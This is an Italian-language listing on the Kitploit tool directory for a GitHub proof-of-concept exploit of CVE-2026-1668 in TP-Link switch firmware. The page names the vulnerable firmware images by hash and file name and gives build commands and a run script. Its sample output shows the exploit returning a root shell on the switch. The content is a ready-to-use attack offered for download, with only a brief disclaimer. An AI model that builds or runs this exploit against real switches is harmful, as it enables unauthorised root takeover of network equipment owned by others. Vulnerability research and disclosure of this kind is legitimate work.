Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-1668-poc — Proof-of-concept exploit per CVE-2026-1668 nel firmware degli switch TP-Link, che distribuisce un payload MIPS in grado di fornire una shell root sui dispositivi vulnerabili. | Kitploit
Strumenti/GitHubGitHub/wuyou6956-glitch/cve-2026-1668-poc
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitReverse EngineeringSicurezza Hardware e IoTSviluppo PayloadAnalisi del FirmwareBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubwuyou6956-glitch/cve-2026-1668-poc

cve-2026-1668-poc

Proof-of-concept exploit per CVE-2026-1668 nel firmware degli switch TP-Link, che distribuisce un payload MIPS in grado di fornire una shell root sui dispositivi vulnerabili.

Vedi Repository
2 giorni faNon ancora revisionato

Exploit proof-of-concept per CVE-2026-1668

Questo è un exploit proof-of-concept per CVE-2026-1668. È inteso puramente a scopo didattico. Si prega di non tentare di sfruttare sistemi che non si possiedono o per i quali non si ha esplicita autorizzazione all'exploit.

Questo proof-of-concept è stato sviluppato contro un'immagine firmware con il seguente hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.

Nomi di firmware noti per corrispondere a tale hash (non esaustivo):

  • SG2005P-PDv1_en_1.0.16_[20251031-rel72837]_up.bin
  • SG2008Pv3_en_3.20.14_[20251031-rel72837]_up.bin
  • SG2008v4_en_4.20.14_[20251031-rel72837]_up.bin
  • SG2016Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2210MPv4_en_4.20.15_[20251031-rel72837]_up.bin
  • SG2210MPv5_en_5.0.12_[20251031-rel72837]_up.bin
  • SG2210Pv5_en_5.20.15_[20251031-rel72837]_up.bin
  • SG2218Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2218Pv2_en_2.0.11_[20251031-rel72837]_up.bin
  • SG2218v1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2428LPv1_en_1.0.12_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.20.17_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.30.13_[20251031-rel72837]_up.bin
  • SG3210v3_en_3.20.14_[20251031-rel72837]_up.bin
  • SL2428Pv6_en_6.20.15_[20251031-rel72837]_up.bin
  • TL-SG2428Pv4_en_4.0.23_[20251031-rel72837]_up.bin

Versioni firmware precedenti sono probabilmente anch'esse vulnerabili, ma potrebbero richiedere modifiche minori al payload dell'exploit.

La spiegazione di come funziona il payload è disponibile in questo post del blog.

Compilazione

Per compilare il payload è necessaria una toolchain GCC MIPS Linux. Su Ubuntu 24.04, è possibile installarla con sudo apt install gcc-mips-linux-gnu.

$ make

Esecuzione

Questo exploit deve essere eseguito prima che il server HTTP abbia servito la sua prima richiesta (cioè a un avvio pulito).

$ ./run.sh

Lo script dovrebbe lasciarti in una shell di root. In caso contrario, l'exploit è fallito.

[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json

{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc # 
Scarica lo strumento